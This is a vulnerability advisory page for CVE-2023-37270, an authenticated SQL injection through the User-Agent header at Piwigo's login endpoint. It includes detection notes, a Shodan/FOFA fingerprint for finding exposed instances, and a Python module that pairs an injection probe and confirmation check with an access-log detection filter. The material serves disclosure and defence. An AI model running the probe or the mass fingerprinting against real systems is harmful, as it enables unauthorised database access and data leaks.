CVE-2023-37270
published 2023-07-07


Priority: P2 · 63 · High
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 3.91% (89.0th percentile)
Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that records the HTTP `User-Agent` header is vulnerable at the endpoint that stores user information when logging in to the administrator screen, so arbitrary SQL statements can be executed. Someone who wants to exploit the vulnerability must be logged in to the administrator screen, but low privileges are enough. Any SQL statement can be executed, which may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, anyone who executes a SQL statement verbatim with user-controllable parameters should escape the parameter contents appropriately before interpolating them.

Affected (1 range)

Vendor    Product   Version range   Fixed in
piwigo    piwigo    < 13.8.0        13.8.0

Detection & IOCs (extracted from sources)

URL: /identification.php
URL: /admin.php?page=user_activity
  • The SQL injection is triggered via the HTTP `User-Agent` header on the POST /identification.php login endpoint. Inject characters that break out of a quoted SQL string literal (e.g., a single quote or double quote; angle brackets are often sent alongside them but do not themselves break SQL) in the User-Agent to trigger a MySQL error that is visible in the subsequent GET /admin.php?page=user_activity response.
  • Confirm exploitation by checking that the response body of GET /admin.php?page=user_activity contains all three strings 'Warning: [mysql error', 'INSERT INTO' and 'SQL syntax;' together; any one of them alone is not sufficient. This check depends on the instance echoing MySQL errors to the page; an instance that suppresses them will not show the markers even when vulnerable.
  • Exploitation requires prior authenticated access to the Piwigo administrator screen (low-privilege credentials are enough), so this is not an unauthenticated attack surface.
  • Use Shodan/FOFA fingerprinting (favicon hash 540706145 or title 'piwigo') to identify exposed Piwigo instances for targeted scanning.
  • The vulnerable code path is in include/dblayer/functions_mysqli.inc.php (line 491) and include/functions.inc.php (line 621); the patch reference is commit 978425527d6c113887f845d75cf982bbb62d761a.
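The two-step check in the bullets above, plus the defender-side counterpart, as an added example that is not Piwigo code and not taken from the page's sources. Everything concrete in it is constructed for illustration: the base URL gallery.example, the login form field names (username/password/login), the response bodies, and the access-log lines. The module performs no network I/O on its own; the HTTP step is passed in as a callable so the logic can be exercised offline against canned responses.

```python
"""Offensive probe and defensive log filter for CVE-2023-37270.

Added example, not Piwigo's code. Assumed/constructed: gallery.example,
the login form field names, all response bodies and all log lines.
"""
import re
from typing import Callable, Dict, Iterator, List, Tuple

LOGIN_PATH = "/identification.php"
ACTIVITY_PATH = "/admin.php?page=user_activity"

# The single quote is what breaks out of the quoted User-Agent literal; the
# double quote and angle brackets mirror common probes but do not affect SQL.
PROBE_USER_AGENT = "Mozilla/5.0 '\"<>"

# The page's confirmation rule: all three markers must appear together.
ERROR_MARKERS = ("Warning: [mysql error", "INSERT INTO", "SQL syntax;")


def build_login_request(base_url: str, username: str, password: str) -> Dict:
    """Login POST carrying the tainted User-Agent (form field names assumed)."""
    return {
        "method": "POST",
        "url": base_url.rstrip("/") + LOGIN_PATH,
        "headers": {"User-Agent": PROBE_USER_AGENT},
        "data": {"username": username, "password": password, "login": "Login"},
    }


def confirm_sqli(body: str) -> bool:
    """True only when every marker is present; any single one is too weak."""
    return all(marker in body for marker in ERROR_MARKERS)


def probe(base_url: str, username: str, password: str,
          send: Callable[[Dict], str]) -> bool:
    """Log in with the tainted User-Agent, then fetch the activity page.

    ``send`` takes a request dict and returns the response body. A real
    client would keep the session cookie between the two calls.
    """
    send(build_login_request(base_url, username, password))
    body = send({"method": "GET",
                 "url": base_url.rstrip("/") + ACTIVITY_PATH,
                 "headers": {"User-Agent": PROBE_USER_AGENT}})
    return confirm_sqli(body)


# Constructed response bodies (not captured from a real instance).
VULNERABLE_ACTIVITY_PAGE = (
    "<pre>Warning: [mysql error 1064] You have an error in your SQL syntax; "
    "check the manual that corresponds to your MySQL server version for the "
    "right syntax to use near ''\"<>')' at line 1\n"
    "INSERT INTO piwigo_activity (user_agent) VALUES ('Mozilla/5.0 '\"<>')</pre>")
PATCHED_ACTIVITY_PAGE = "<html><body><table id=\"activity\">...</table></body></html>"


def canned_send(activity_body: str) -> Callable[[Dict], str]:
    """Offline stand-in for an HTTP client: returns a fixed activity page."""
    def send(req: Dict) -> str:
        return activity_body if ACTIVITY_PATH in req["url"] else ""
    return send


# Defender side: Apache/nginx "combined" log format. The server writes a
# literal double quote inside the User-Agent as \" so the UA field regex
# accepts backslash-escaped characters.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$')
_QUOTE_IN_UA = re.compile(r"""['"]|%27""")


def suspicious_login_ua(lines: List[str]) -> Iterator[Tuple[str, str]]:
    """Yield (client_ip, user_agent) for login POSTs whose UA carries a quote."""
    for line in lines:
        m = _COMBINED.match(line)
        if m is None or m["method"] != "POST" or not m["path"].startswith(LOGIN_PATH):
            continue
        if _QUOTE_IN_UA.search(m["ua"]):
            yield m["ip"], m["ua"]


# Constructed access-log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.2 - - [10/Jul/2023:12:00:00 +0000] "POST /identification.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Jul/2023:12:00:01 +0000] "POST /identification.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 \'\\"<>"',
    '203.0.113.7 - - [10/Jul/2023:12:00:02 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0 \'"',
    '203.0.113.7 - - [10/Jul/2023:12:00:03 +0000] "POST /identification.php HTTP/1.1" 302 0 "-" "curl/8.0 %27"',
]

if __name__ == "__main__":
    print("vulnerable:", probe("https://gallery.example", "user", "pass",
                               canned_send(VULNERABLE_ACTIVITY_PAGE)))
    for ip, ua in suspicious_login_ua(SAMPLE_LOG):
        print("suspicious login UA from", ip, "->", ua)
```

To run it against a live instance you own, replace `canned_send` with a wrapper around an HTTP client that keeps the session cookie between the login POST and the activity-page GET; the decision logic in `confirm_sqli` stays the same. The log filter deliberately keys on the login endpoint rather than on every request with a quote in the User-Agent, which keeps it from flagging ordinary browsers whose UA strings legitimately contain apostrophes elsewhere on the site.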